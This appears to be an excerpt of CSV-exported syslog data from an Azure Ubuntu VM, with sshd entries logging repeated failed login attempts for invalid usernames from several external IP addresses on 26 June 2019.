+18825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:51,UbuntuDevEnv,2019-06-26 10:49:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,89774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:53,UbuntuDevEnv,2019-06-26 10:49:53,auth,UbuntuDevEnv,info,Failed password for invalid user taxi from 47.44.115.81 port 57704 ssh2,89774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taxi,47.44.115.8,57704,,
+18827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:53,UbuntuDevEnv,2019-06-26 10:49:53,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 57704:11: Bye Bye [preauth],89774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,57704,,
+18828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:53,UbuntuDevEnv,2019-06-26 10:49:53,auth,UbuntuDevEnv,info,Disconnected from invalid user taxi 47.44.115.81 port 57704 [preauth],89774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taxi,47.44.115.8,57704,,
+18829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:50:43,UbuntuDevEnv,2019-06-26 10:50:43,auth,UbuntuDevEnv,info,Invalid user se from 37.59.6.106 port 33694,90044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,se,37.59.6.1,33694,,
+18830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:50:43,UbuntuDevEnv,2019-06-26 10:50:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:50:43,UbuntuDevEnv,2019-06-26 10:50:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,90044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:50:45,UbuntuDevEnv,2019-06-26 10:50:44,auth,UbuntuDevEnv,info,Failed password for invalid user se from 37.59.6.106 port 33694 ssh2,90044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,se,37.59.6.1,33694,,
+18833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:50:45,UbuntuDevEnv,2019-06-26 10:50:44,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 33694:11: Bye Bye [preauth],90044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,33694,,
+18834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:50:45,UbuntuDevEnv,2019-06-26 10:50:44,auth,UbuntuDevEnv,info,Disconnected from invalid user se 37.59.6.106 port 33694 [preauth],90044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,se,37.59.6.1,33694,,
+18835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:23,UbuntuDevEnv,2019-06-26 10:51:23,auth,UbuntuDevEnv,info,Invalid user jfbrard from 106.13.142.247 port 42820,90185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jfbrard,106.13.142.2,42820,,
+18836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:23,UbuntuDevEnv,2019-06-26 10:51:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:23,UbuntuDevEnv,2019-06-26 10:51:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,90185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:25,UbuntuDevEnv,2019-06-26 10:51:25,auth,UbuntuDevEnv,info,Failed password for invalid user jfbrard from 106.13.142.247 port 42820 ssh2,90185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jfbrard,106.13.142.2,42820,,
+18839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:26,UbuntuDevEnv,2019-06-26 10:51:25,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 42820:11: Bye Bye [preauth],90185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,42820,,
+18840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:26,UbuntuDevEnv,2019-06-26 10:51:25,auth,UbuntuDevEnv,info,Disconnected from invalid user jfbrard 106.13.142.247 port 42820 [preauth],90185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jfbrard,106.13.142.2,42820,,
+18841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:56,UbuntuDevEnv,2019-06-26 10:51:55,auth,UbuntuDevEnv,info,Invalid user zu from 47.44.115.81 port 46718,90305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zu,47.44.115.8,46718,,
+18842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:56,UbuntuDevEnv,2019-06-26 10:51:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,90305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:56,UbuntuDevEnv,2019-06-26 10:51:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:58,UbuntuDevEnv,2019-06-26 10:51:57,auth,UbuntuDevEnv,info,Failed password for invalid user zu from 47.44.115.81 port 46718 ssh2,90305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zu,47.44.115.8,46718,,
+18845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:58,UbuntuDevEnv,2019-06-26 10:51:57,auth,UbuntuDevEnv,info,Disconnected from invalid user zu 47.44.115.81 port 46718 [preauth],90305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zu,47.44.115.8,46718,,
+18846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:51:58,UbuntuDevEnv,2019-06-26 10:51:57,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 46718:11: Bye Bye [preauth],90305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,46718,,
+18847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:52:59,UbuntuDevEnv,2019-06-26 10:52:59,auth,UbuntuDevEnv,info,Invalid user nikolay from 106.13.142.247 port 55074,90521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nikolay,106.13.142.2,55074,,
+18848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:52:59,UbuntuDevEnv,2019-06-26 10:52:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:52:59,UbuntuDevEnv,2019-06-26 10:52:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,90521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:53:01,UbuntuDevEnv,2019-06-26 10:53:01,auth,UbuntuDevEnv,info,Failed password for invalid user nikolay from 106.13.142.247 port 55074 ssh2,90521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nikolay,106.13.142.2,55074,,
+18851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:53:01,UbuntuDevEnv,2019-06-26 10:53:01,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 55074:11: Bye Bye [preauth],90521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,55074,,
+18852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:53:01,UbuntuDevEnv,2019-06-26 10:53:01,auth,UbuntuDevEnv,info,Disconnected from invalid user nikolay 106.13.142.247 port 55074 [preauth],90521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nikolay,106.13.142.2,55074,,
+18853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:01,UbuntuDevEnv,2019-06-26 10:54:01,auth,UbuntuDevEnv,info,Invalid user vps from 47.44.115.81 port 35730,90736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,47.44.115.8,35730,,
+18854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:01,UbuntuDevEnv,2019-06-26 10:54:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,90736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:01,UbuntuDevEnv,2019-06-26 10:54:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:03,UbuntuDevEnv,2019-06-26 10:54:03,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 47.44.115.81 port 35730 ssh2,90736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,47.44.115.8,35730,,
+18857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:03,UbuntuDevEnv,2019-06-26 10:54:03,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 47.44.115.81 port 35730 [preauth],90736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,47.44.115.8,35730,,
+18858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:03,UbuntuDevEnv,2019-06-26 10:54:03,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 35730:11: Bye Bye [preauth],90736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,35730,,
+18859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:16,UbuntuDevEnv,2019-06-26 10:54:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=156.220.238.90,90785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,156.220.238.9,,0,
+18860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:16,UbuntuDevEnv,2019-06-26 10:54:16,auth,UbuntuDevEnv,info,Invalid user admin from 156.220.238.90 port 33832,90785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,156.220.238.9,33832,,
+18861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:16,UbuntuDevEnv,2019-06-26 10:54:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:18,UbuntuDevEnv,2019-06-26 10:54:18,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 156.220.238.90 port 33832 ssh2,90785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,156.220.238.9,33832,,
+18863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:19,UbuntuDevEnv,2019-06-26 10:54:18,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 156.220.238.90 port 33832 [preauth],90785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,156.220.238.9,33832,,invalid
+18864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:21,UbuntuDevEnv,2019-06-26 10:54:21,auth,UbuntuDevEnv,info,Invalid user admin from 41.38.113.49 port 48552,90811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,41.38.113.4,48552,,
+18865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:21,UbuntuDevEnv,2019-06-26 10:54:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:21,UbuntuDevEnv,2019-06-26 10:54:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=41.38.113.49,90811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,41.38.113.4,,0,
+18867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:23,UbuntuDevEnv,2019-06-26 10:54:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 41.38.113.49 port 48552 ssh2,90811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,41.38.113.4,48552,,
+18868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:23,UbuntuDevEnv,2019-06-26 10:54:23,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 41.38.113.49 port 48552 [preauth],90811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,41.38.113.4,48552,,invalid
+18869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:36,UbuntuDevEnv,2019-06-26 10:54:36,auth,UbuntuDevEnv,info,Invalid user he from 106.13.142.247 port 39098,90858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,he,106.13.142.2,39098,,
+18870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:36,UbuntuDevEnv,2019-06-26 10:54:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:36,UbuntuDevEnv,2019-06-26 10:54:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,90858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:38,UbuntuDevEnv,2019-06-26 10:54:37,auth,UbuntuDevEnv,info,Failed password for invalid user he from 106.13.142.247 port 39098 ssh2,90858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,he,106.13.142.2,39098,,
+18873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:38,UbuntuDevEnv,2019-06-26 10:54:38,auth,UbuntuDevEnv,info,Disconnected from invalid user he 106.13.142.247 port 39098 [preauth],90858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,he,106.13.142.2,39098,,
+18874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:54:38,UbuntuDevEnv,2019-06-26 10:54:38,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 39098:11: Bye Bye [preauth],90858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,39098,,
+18875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:55:58,UbuntuDevEnv,2019-06-26 10:55:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:55:58,UbuntuDevEnv,2019-06-26 10:55:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,91156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:55:58,UbuntuDevEnv,2019-06-26 10:55:58,auth,UbuntuDevEnv,info,Invalid user lian from 47.44.115.81 port 52976,91156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lian,47.44.115.8,52976,,
+18878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:00,UbuntuDevEnv,2019-06-26 10:56:00,auth,UbuntuDevEnv,info,Failed password for invalid user lian from 47.44.115.81 port 52976 ssh2,91156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lian,47.44.115.8,52976,,
+18879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:00,UbuntuDevEnv,2019-06-26 10:56:00,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 52976:11: Bye Bye [preauth],91156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,52976,,
+18880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:00,UbuntuDevEnv,2019-06-26 10:56:00,auth,UbuntuDevEnv,info,Disconnected from invalid user lian 47.44.115.81 port 52976 [preauth],91156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lian,47.44.115.8,52976,,
+18881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:14,UbuntuDevEnv,2019-06-26 10:56:13,auth,UbuntuDevEnv,info,Invalid user cisco from 106.13.142.247 port 51356,91210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cisco,106.13.142.2,51356,,
+18882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:14,UbuntuDevEnv,2019-06-26 10:56:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,91210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:14,UbuntuDevEnv,2019-06-26 10:56:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:56:16,UbuntuDevEnv,2019-06-26 10:56:15,auth,UbuntuDevEnv,info,Failed password for invalid user cisco from 106.13.142.247 port 51356 ssh2,91210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cisco,106.13.142.2,51356,,
